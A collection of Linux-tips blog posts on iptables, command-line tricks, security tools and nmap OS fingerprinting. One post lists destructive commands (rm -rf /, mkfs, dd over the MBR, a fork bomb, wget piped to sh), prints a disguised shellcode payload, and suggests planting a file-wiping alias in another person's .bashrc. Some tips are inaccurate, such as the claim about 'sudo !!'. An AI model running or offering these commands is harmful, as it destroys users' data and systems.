Understanding VIM : Beginner's Tutorial-1

Vim editor takes some time to settle within the working arena  of professionals. It's a cake walk when people use it for atleast a week.
There are three modes in vim - insert mode, command mode, and last-line mode.
Insert mode is meant for inserting text, press i for start mode. Command mode is used for executing formating texts. Last-line mode is used for executing extended commands for text formating.
Start Vim by typing vim /vi .

Enhance Linuxbox Security : Iptables Printer Rules to Limit Access to Local LAN.

Assume a topology of a local LAN connected to the internet through a gateway in which you are configuring Iptables firewall. This gateway is attached to a printer & running a print server. The LAN belongs to 192.168.1.0/24 ip range. We want to limit the access of printer within the local LAN & bar the printer access from the outside internet. See figure.

Enhance Linuxbox Security : Creating a Custom Chain in Iptables

Read this post before proceeding as it contains simple basic firewall configuration file.
We can customize the flow of rules in iptables by creating new custom chains. The flow of rules in iptables follows the sequence of their execution.

Linux Amazing Keypresses & Commands : Set 5

• By default in Bash shell pressing Ctrl+D will exit the current shell . To prevent it you can add the following line in ~/.bashrc:

export IGNOREEOF=1

And then source the file to read it again:

source ~/.bashrc

Fuduntu = [Fedora + Ubuntu]

Fuduntu is a perfect distro for those users who hate RedHat due to its complexities & less user friendliness. It is a distro developed to bridge the gap between Fedora & Ubuntu. It is a Fedora remix optimized for Netbook and other portable computers & may be regarded as the most attractive cousin of RedHat. Fedora mainly focuses on developers perspective whereas Ubuntu focuses on end user experience. Distros like Mint, Ubuntu are well versed with user needs & append it’s apps, but Fedora lacks such schemes. These are the pitfalls which are mainly taken care of in Fuduntu. Although, it’s in an incipient stage now, it has a good collection of default packages. It also needs to focus more on user needs.

Enhance Linuxbox Security : Basic Iptables Firewall Configuration

If you are not familiar with Iptables, read this posts first.
http://linux-techy.blogspot.com/2010/04/enhance-linux-box-security-iptables.html
http://linux-techy.blogspot.com/2010/04/enhance-linux-box-security-iptables_30.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables_27.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables_2179.html
http://linux-techy.blogspot.com/2010/12/enhance-linuxbox-security-know-all.html
 In this post, I have tried to build a simple & basic iptables firewall for filtering the outside traffic.  I’m going to create a simple shell script  which is independent to the topology of network. Later on we will add complexity to the file as per the need & topology.

Prioritize processes using Taskset

Almost every system has multiprocessors nowadays. You may require to run a process using 1 CPU or multiple CPUs. This functionality can be used by installing taskset.
Let's say you want to run firefox using one CPU. You'd run something like this:

taskset 0x00000001 firefox

For allowing firefox to use 2 CPUs replace 0x00000001 with 0x00000003

For allowing firefox to use all CPUs replace 0x00000001 with 0xFFFFFFFF

Working With Alias

In Linux, we are provided with a cool tool that can create new shortened command for a  given command. It is called alias. That is, it allows a user to create simple names or abbreviations (even consisting of just a single character) for commands regardless of how complex the original commands are and then use them in the same way that ordinary commands are used. The alias command is built into a number of shells including ash, bash (the default shell on most Linux systems), csh and ksh.To create alias type the command:

#alias  

Eg.#alias dir="ls" 

Other Advanced Linux Bootloaders.

In most Linux system GRUB (Grand Unified Bootloader) or GRUB 2  is the default bootloader. If you have more than one OS installed in your hardware, then you have to stare for few seconds on the bootloader everytime, you power on. There are other options which will help you getting ride of such monotonicity. If your system has GRUB by default (Fedora & OpenSUSE), you can upgrade it to GRUB 2 which has more features. There is also a derivative of GRUB called Burg (GRUB, letters written in reverse stands for  Brand-new Universal loader from GRUB ). Let's see the features of both bootloader separately:

Gnacktrack = [Gnome + BackTrack]

There is a new penetration testing Live CD in the market. It's called GnackTrack,  made solely for the Gnome lovers. GnacktrackR3 is based on Ubuntu 10.10. There are other penetration testing Live CD like BackTrack, DVL etc. BackTrack is the most well known name with in penetration testing community. Gnacktrack sounds like Backtrack but it's based on Gnome.
The story goes like this (quote from faq),

Vinux : Linux For Visually impaired

Vinux 3.1 is has been launched which is a linux based on Ubuntu 10.10 meant for visually impaired users. It’s available in CD & DVD (USB & virtual version is yet to come) in both 32 bit & 64 bit version.  Vinux  has it’s own package repository, users can install packages using apt-get/synaptic & dedicated IRC channel. Beginner can press  (Ctrl+Alt+Q) to access Quick Start Guide.

Powertop : [Top + Power Management]

Powertop is a utility software that lists processes which are eating away your battery power & suggests you power saving useful tips. The utility in mainly meant for laptops where power consumption is critical issue. Powertop is the project of lesswatts.org. You can check this link for the processes which usually consume more power.

Enhance Linuxbox Security : Know all services listening on some ports.

There is a inbuilt tool used in Linux that can be used to list the services listening on some ports of your system. This is important because of the following reasons:

• Any malware or spyware compromising your security can be noticed & traced. 
• Check on the (unencrypted) packets which can be easily sniffed in open (wifi) network.

 Netstat is the tool. Execute the command to list the services which are listening to some ports.

$netstat -nap

Linux Amazing Keypresses & Commands : Set 5

• Finding the top 20 processing in consuming the RAM.

$ps aux | awk '{print $2, $4, $11}' | sort -k2rn | head -n 20

This command will list the top 20 process in decreasing order of their RAM consumption. It will be more helpful if you add a alias this command. Another solution for it is htop.
Install htop. For Fedora/RedHat users.

$yum install htop

For Ubuntu users.

$sudo apt-get install htop

For sorting the processes run htop & type
M for RAM
P for CPU
T for TIME
To invert the processes type I.

rtcwake : Wake up your system after given time.

Waking up the pc is the common need of every moderate users. In that case rtcwake is a useful utility for you. Using this utility you can wake up your linux box at any given time. So, why do we need to wake up the poor soul. Because of the following reasons:

• System clean-up when you are busy sleeping after exploiting the pc for a whole day.
• Routine System backup when you are busy attending other emergencies. 
• Running a cron job like buzzing a song to wake you up. 

The usage can be endless. To install this program. Execute commands below.

sudo apt-get install rtcwake
sudo chmod u+s /usr/sbin/rtcwake

An example of the rtcwake command can be

rtcwake -m mem -s 300

Encrypt files using EncFS

Creating an encrypted folder using EncFS is a easy job. It's a simple utility to encrypt your files. At first you have to login as a root.
Execute >su & enter root password.

Install encfs & fuse.

$apt-get install encfs fuse-utils

Load the use module in the kernel as root

$modprobe fuse

Antivirus Solutions for linux-3

Continued... from the previous post.

5. Kaspersky Anti-Virus for Linux Workstation is a two-part solution designed to protect workstations. The first module, the on access protection, is integrated with the operating system and checks file modified files (either new or amended files), thereby ensuring real-time protection of the system without significantly increasing server load. The second module, the on demand scanner, scans the file system, removable media devices and individual files either on schedule or on demand.

Antivirus Solutions for linux-2

Continued.... from previous post.

3. F-Prot Antivirus for Linux Workstations is meant for home users using the Linux open-source operating system . F-PROT Antivirus for Linux Workstations utilizes the renowned F-PROT Antivirus scanning engine for primary scan but has in addition to that a system of internal heuristics devised to search for unknown viruses.
F-PROT Antivirus for Linux was especially developed to effectively eradicate viruses threatening workstations running Linux. It provides full protection against macro viruses and other forms of malicious software - including Trojans.                     
F-PROT for Linux Workstations features:

Antivirus Solutions for linux

It's naive to say that Linux systems are immune to viruses. Linux systems are seldom attacked by viruses because very few viruses are developed targeting Linux systems. Officially Linux desktops are now more than 1% in desktop markets shares. It's the time when people should start thinking about Linux anti-viruses. There are some free/non free solutions: 
1. Avast Linux Home Edition
Avast is famous anti-virus for providing free anti-virus for windows, now they are providing free anti-virus for increasing Linux systems.

Advanced Intrusion Detection Environment (AIDE) -host based IDS for Linux

Advanced Intrusion Detection Environment or AIDE is a host-based IDS & free substitute for Tripwire.
It scans the filesystem and logs the attributes of important files, directories, and devices. Each time it runs, it compares its scanned attributes against the previous, "known good" data, and alerts you if something has changes.
AIDE works by reading in the configuration file /etc/aide/aide.conf that contains
1. the attributes of each entry to log. There are currently thirteen attributes that AIDE can log — including permissions, owner, group, size, all three timestamps (atime, ctime, and mtime), plus lower-level stuff like inode, block count, number of links, and so on.
You will find these codes in the conf file.

OSSIM: the Open Source Security Information Management System

A Security Information Management system (SIM), is a toolset that fills in that gap by collecting eventlogs into a central repository for trend analysis from different tools. It centralizes log information, correlates logs to establish cause-effect relationship between events, prevents possible damage/flaws on the company’s resources etc.  

OSSIM is a fully featured SIM solution that offers all the necessary functionality, ranging from the detection at low-level to high-level reporting. 

Based on GNU/Linux Debian, kernel 2.6, OSSIM integrates a handy suite of security open source tools

Linux Amazing Keypresses & Commands : Set 4

1. command

$sudo !!

After executing this command, you have to never think about typing sudo. When you type enter     after typing sudo !! , user password prompt will appear & after entering password, the user don't need to enter sudo before the commands.

2. pressing [tab] twice
    This is the favorite keypress used by linux users. It's useful tool for auto completion of commands. Type initial characters of a command & hit tab twice. Eg. type if & hit tab twice. shell will display all the possible commands beginning with if like 'ifconfig'.

Webcam setup in Debian Linux

Setting up things in Debian systems is quite easy due to the online installation utilities like apt-get & aptitude. For setting up your webcam connect your webcam to the usb. Execute the command.

>  lsusb

If the cam is supported then it will show its information. After that we have to install a cam application software. Camorama can capture stills or display images as they happen. It has no streaming capabilities.

>aptitude install camorama

PCs/Laptop with linux preinstalled.

Linux is now not all all geeky stuff. People like working in Linux & praise it's powers & capabilities to handle specialized & general tasks. Dell, system76, and ZaReason offer excellent PCs and laptops with pre-installed Ubuntu.
These site provides a pre-compiled list of some pc/laptop vendors that provides linux
-> http://lxer.com/module/db/index.php?dbn=14 
-> http://www.linuxhq.com/vendors/systems.html

And after that you should read these links
http://www.geeksaresexy.net/2010/11/08/why-buy-linux-pre-installed/
http://www.pcworld.com/businesscenter/article/212014/how_to_buy_a_computer_preloaded_with_ubuntu.html

Online Crontab Tool

Crontab is a handy tool for scheduling particular tasks/commands. You can set a time for updating the system, shutting it down etc. So, to use the crontab, issue the command
>crontab -e 
This will display the crontab file which you can edit to set your tasks.
These are the options related to crontab
crontab -e    Edit your crontab file, or create one if it doesn’t already exist.
crontab -l      Display your crontab file.
crontab -r      Remove your crontab file.
crontab -v      Display the last time you edited your crontab file. (This option is only available on a few systems.)

Best backup tools in Linux.

Data lose is one of the major fears of the users.Disk failures & accidents are the common cause of data lose which can occur at any time, so it's really important to keep track of our data regularly.
Backup tools comes with various features:
-enable you to identify important files and directories that are then constantly monitored and regularly backed up.
-perform incremental backups, which – after making a complete initial imprint of the directory – will then only make copies of new files or those that have changed since the last backup inorder to tackle redundancy.
-compress your data so you can store it more efficiently.
-tools that will encrypt your data when making copies.
-GUI and command line flavours

Find command demystified-2

Find command can be used to copy move or delete files as we need.
>find -name "*.mp3" -exec cp {} /path/to/folder \;
This command will move all your files to a particular /path/to/folder .

Similarly you can move or delete files.
>find -name "*.mp3" -exec cp {} /path/to/USB \;
>find -name '*.mp3' -exec rm {} \;

Find files using the ownership parameter.
>find /path/to/folder -user -name “*.doc” 

Direct the output of find command to a file.
>find / -name "*.mp3" > record.txt
This command will save the paths of all mp3 files in a txt file, record.txt.

Find command demystified.

find command is cool tool for searching lost items. Lets find the mystery in 'find':

>find -name “abc.jpg”
is directory in which file is to be searched. Eg. '.' for present working directory. '/' for root [of course without single quotes].


In using wildcards * denotes the part of file you don't remember or you're not sure. Suppose your searching the file mission-impossible-3.mov. Some of the possible find searches could be:
>find -name "mission*"
>find -name "*mission*"
>find -name "*impossible*"
>find -name "mission*.mp3"

Linux Amazing Keypresses & Commands : Set 3

1. Unmount busy drives
You are probably all too familiar with the situation - you are trying to unmount a drive, but keep getting told by your system that it's busy. But what application is tying it up? A quick one-liner will tell you:
$lsof +D /mnt/windows
This will return the command and process ID of any tasks currently accessing the /mnt/windows directory. You can then locate them, or use the kill command to finish them off.

2. su command  fast execution without logging in.
$su --c [command]
It enables you to issue a command in administrative mode directly after providing the superuser password. And when the command is executed the user is logged off to the previous user.

Linux Amazing Keypresses & Commands : Set 2

1. Some handy linux keyboard shortcuts!
[alt][tab] Walk through windows. To walk backwards: [alt][shift][tab]
[ctrl][tab] Walk through desktops. To walks backwards: [ctrl][shift][tab]
[ctrl][esc] Show the table of processes running on my system. Allow me to kill any of the processes I started (or send other signals to them).
[alt][f1] Access the K-menu ("Equivalent to MS Windows "Start" menu).
[alt][f12] Emulate the mouse using the arrow keys on the keyboard.
[alt][leftmousebutton] Drag a window to move it. Normally, I move a window by dragging its top title bar, but occassionally I manage to get it off the screen. With this shortcut, I can drag by any part of the window.

Linux Amazing Keypresses & Commands : Set 1

If you want to make your Linux working experience more comfortable & faster, then go through these commands.
1. Linux commands on the console may often span many lines, and encountering a type mistake at the beginning of the command would require you to use the slow way of punching the right/left arrow keys to traverse in the command string.
Remedy : Try Ctrl+e to move to the end of the command string and Ctrl+a to reach start. It’s the fastest way to edit a Linux command line. To delete a word in the command string, use Ctrl+w.

Enhance Linux Box Security: Iptables made easy - tutorial part 4

This time we are concern with mangle rules of iptables.
Mangling of packets is done only with NAT and is a part of the NAT process. In NAT, we can "mangle" a packet as modifying the Source IP address and Destination IP address fields of the IP header.
Format of IP PACKET

Enhance Linux Box Security: Iptables made easy - tutorial part 3.2

We were left with Destination Network Address Translation part of the NAT rules of the iptables.

DNAT Destination NAT, deals with Prerouting & used to rewrite the Destination IP address of a packet. It's used for appending the destination IP for the packets meant for our internal LAN machines. When the packet reaches our external public IP, its destination address is DNATed & the packet is transferred to the local internal LAN machine. DNAT can only be used with prerouting & output chain. It is meant for all input packets/interface therefore '-i'. Destination NAT is specified using `-j DNAT', and the `--to-destination' option specifies an IP address, a range of IP addresses, and an optional port or range of ports (for UDP and TCP protocols only).

Enhance Linux Box Security: Iptables made easy - tutorial part 3.1

This time, we will deal with NAT rules of iptables. NAT means Network Address Translation.
It is of 2 types - SNAT & DNAT
SNAT means Source NAT, deals with Postrouting/Masquerading. The SNAT target means that this target will rewrite the Source IP address in the IP header of the packet. It's used for hiding the private IPs from the internet. Packets leaving from an internal LAN when reaches the public IP or the firewall (visible to internet) is SNATed & then transferred to the destination. It appears to the external internet as if our external public IP is the originator of the packet. Postrouting is used in case of static IPs whereas Masquerading is used in case of dynamic IPs

The `-o' option is used as it is an outgoing interface. `-j SNAT' specifies Source NAT and the `--to-source' option specifies an IP address, a range of IP addresses, and
an optional port or range of ports (for UDP and TCP protocols only).

Enhance Linux Box Security: Iptables made easy - tutorial part 2

This time, we will deal with filter rules of iptables. While using filter rules, we don't need to write filter as it default option in iptables.
We have three chains here input, output & forward.
Input chain checks those packets which are originate outside & meant for machine
Output chain checks those packets which originate from the machine & meant for outer systems
Forward chain checks those packets which are being routed from our machine.
The best way of implementing the iptables is to create a shell script & execute it.

Enhance Linux Box Security: Iptables made easy - tutorial part 1

We can enhance the security & lock down our system by implementing packet filtering using iptables.
packet filtering is defined as as the process of controlling network packets as they enter, move through & exit the network stack within the kernel.
In pre-2.4 Linux kernels, ipchains are used, in 2.4 & beyond, iptables are used which improved the scope & control network packet filtering. We can implement kernel level internet firewall on stateless & stateful packet filtering using iptables. It can be implemented in both IPv4 & IPv6. Its also used in NAT & masquerading for subneting purposes.

Linux deadly commands.

Here is a list of commands that can sabotage your pc & crashes it.


1) #rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.
Other variants :

Code:

rm -rf .
rm -rf *
rm -r .[^.]*

2) A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

3) #mkfs.ext3 /dev/sda
This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
Other variants.

Code:

mkfs
mkfs.ext3
mkfs.anything

4)  #:(){:|:&};:
Infamous fork bomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Further information at http://linux-techy.blogspot.com/2010/03/fork-bomb-fire-in-hole.html 
In Perl

Code:

fork while fork

5)  #any_command > /dev/sda
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6) #wget http://some_untrusted_source -O- | sh
Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you. Above command is same as

Code:

wget http://some_place/some_file
sh ./some_file

7) #mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.


8)  #echo "alias ls='rm -rf /'" >> /home/personyoudontlike/.bashrc
Creating a alias of ls command which means complete destruction.

9) #cat /dev/zero > /var
it will write zeroes to /var or cat it to your favorite file to destroy.

10) #chmod 711 /
Locksdown & freezes your system.
Similar command #chmod 777 /

11) #dd if=/dev/zero of=/dev/hda bs=512 count=1
(/dev/hda is just an example of which device you are booting from---these days with most disks being SATA, it's probably /dev/sda)
Zeros out the MBR (master boot record) so you can no longer boot. You can of course zero out the entire drive by removing the "bs=512 count=1" directives.

References
http://ubuntuforums.org/announcement.php?a=54

Running Windows Applications in Linux

Transitioning from Windows to Linux is often quite difficult for Linux beginners. There are plenty of solutions available in the market today which will provide you a platform to install a window software in Linux.
Wine in one of the them. Many Linux OS have already started providing wine by default like linux Mint, Kubuntu etc.

Wine is a compatibility layer for running Windows programs. It is a completely free alternative implementation of the Windows API consisting of 100% non-Microsoft code.

Before you get started, you may want to check and confirm that the Windows program you want to install is in fact supported by Wine. Visit the Wine Application Database for a list of all the programs known to work in Wine, and at what level (fully supported, needs some tweaking, etc).



There is another software called Crossover
which requires registration. Visit this site http://www.howtogeek.com/howto/linux/how-to-install-windows-applications-on-linux-using-crossover/ for further information


If you don't want any hassle of installing packages in linux like Wine & Crossover, I suggest these alternatives.

1> Search for open source alternatives. There are plenty of alternatives available in market like gimp instead of Photoshop, openoffice instead of Microsoft office, BriscCad instead of Autocad.
I feel like, you are not satisfied yet. Goto www.osalt.com.
On that site, you can enter the name of the Windows application and it will list the open source alternatives that provide similar functionality.

2> Run windows in a virtual machines. Some of the solutions available are VmWare & VirtualBox. Install windows inside linux & work in it.

Citrix

3> Run application in remote windows system. Ofcourse, this require extra resources. Most preferred application used are rdesktop & Citrix.


If you want it other way round i.e. running linux software in windows,
check this out -->http://hacks-tweaks-security.blogspot.com/2010/04/creating-linux-environment-installing.html

OS-Fingerprinting.

No firewalls can block icmp packets since its the basic way of communication & talking with the alive hosts. Many tools in linux use this protocol for OS fingerprinting such as sing & hping2. First we need to know the alive hosts in a subnet.
>for i in {1..254}; do ping -c1 192.168.0.$i; done |grep "ttl"
This command will print all reply summary from alive hosts
In this command, I'm using shell programming to ping all hosts in my subnet 192.168.0.0/24 .
We can also use another application called fping.
install fping by executing command
>sudo apt-get install fping
    To query the network for alive hosts in the subnet 192.168.1.0/24 give the command.
>fping -g 192.168.1.0/24 | grep "alive"
            or
>fping -g 192.168.1.0 192.168.1.255 | grep "alive"  


Now as we have found the alive ips we can continue to OS fingerprinting
Install sing by command > sudo apt-get install sing
For OS fingerprinting type sing -O ip_address 


There is another well known tool called NMAP, its glamourised in movies like MATRIX & Swordfish. It has varied options for playing around with the packets being send.
>nmap -v -sP 172.17.191.0/24 |grep "up"  // scanning a subnet for alive ips
>nmap -v -v -A 172.17.191.203            // scanning a pc
If this command don't works try "nmap -v -v -A -PN 172.17.191.203" forcing icmp packets.
Zenmap is another tool, which is GUI version of nmap. GFI languard is another famous tool. 
Watch this video on OS fingerprinting using Zenmap



Further reading .
http://nmap.org/book/osdetect.html
http://nostromo.joeh.org/osf.pdf

Fork BomB -- FIRE IN THE HOLE!

Here comes the fork bomb, it will explode & crash your system within minutes.

$ :(){ :|: & };:

It’s actually a shell function;  :() denotes unnamed function with the body enclosed in {}. The statement ‘:|:’ makes a call to the function itself and pipes the output to another function call—which is the same function & puts all processes in the background and hence you can’t kill any process. Finally ‘;’ completes the function definition and the last ‘:’ initiates a call to this unnamed function. So it recursively creates processes and eventually your system will hang. This is one of the most dangerous Linux commands and may cause your computer to crash!

 Solution : How to avoid a fork bomb? Of course, by limiting the process limit; you need to edit /etc/security/limits.conf. Edit the variable nproc to user_name hard nproc 100. You require root privileges to modify this file.

Above code is same as ->

forkbomb(){forkbomb|forkbomb&}; forkbomb

Check out this video from youtube about fork bomb prank.